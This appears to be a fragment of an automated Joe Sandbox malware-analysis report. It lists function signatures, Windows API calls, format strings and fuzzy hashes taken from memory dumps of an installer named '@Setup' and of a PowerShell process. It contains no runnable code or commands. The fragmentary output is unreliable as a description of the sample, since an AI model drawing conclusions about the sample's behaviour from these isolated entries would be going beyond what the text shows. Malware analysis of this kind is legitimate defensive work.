                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                                                                    • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                    • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                    • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                    • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                                                                    • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                    • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                    • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                    • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcatwsprintf
                                                                                                                                                    • String ID: %02x%c$...
                                                                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                                                                    APIs
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                    • API String ID: 2266616436-4211696005
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406902
                                                                                                                                                    • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1599320355-0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                    • String ID: Version
                                                                                                                                                    • API String ID: 512980652-315105994
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2883127279-0
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                    • String ID: !N~
                                                                                                                                                    • API String ID: 623250636-529124213
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                    Strings
                                                                                                                                                    • Error launching installer, xrefs: 00405C74
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                      • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                    • API String ID: 3509786178-2769509956
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                    • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                    • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                    • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                    • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                    • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                    • API String ID: 0-2551064546
                                                                                                                                                    • Opcode ID: 483b1b227ce8a8c2a1f5920ac614394fac59388f648ca92a94f0756a8c8f1909
                                                                                                                                                    • Instruction ID: 0690445d9e59a5adf28a45787986e35ee1da46d0d5df48f3f55814090b16cff8
                                                                                                                                                    • Opcode Fuzzy Hash: 483b1b227ce8a8c2a1f5920ac614394fac59388f648ca92a94f0756a8c8f1909
                                                                                                                                                    • Instruction Fuzzy Hash: BF4258B1B0431A8FC7258B69D8107AABBF6AFC6310F1584AAD516CF352DB31CD45C7A1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                    • API String ID: 0-1608119003
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                    • API String ID: 0-3272787073
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                    • API String ID: 0-2125118731
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                    • API String ID: 0-2049395529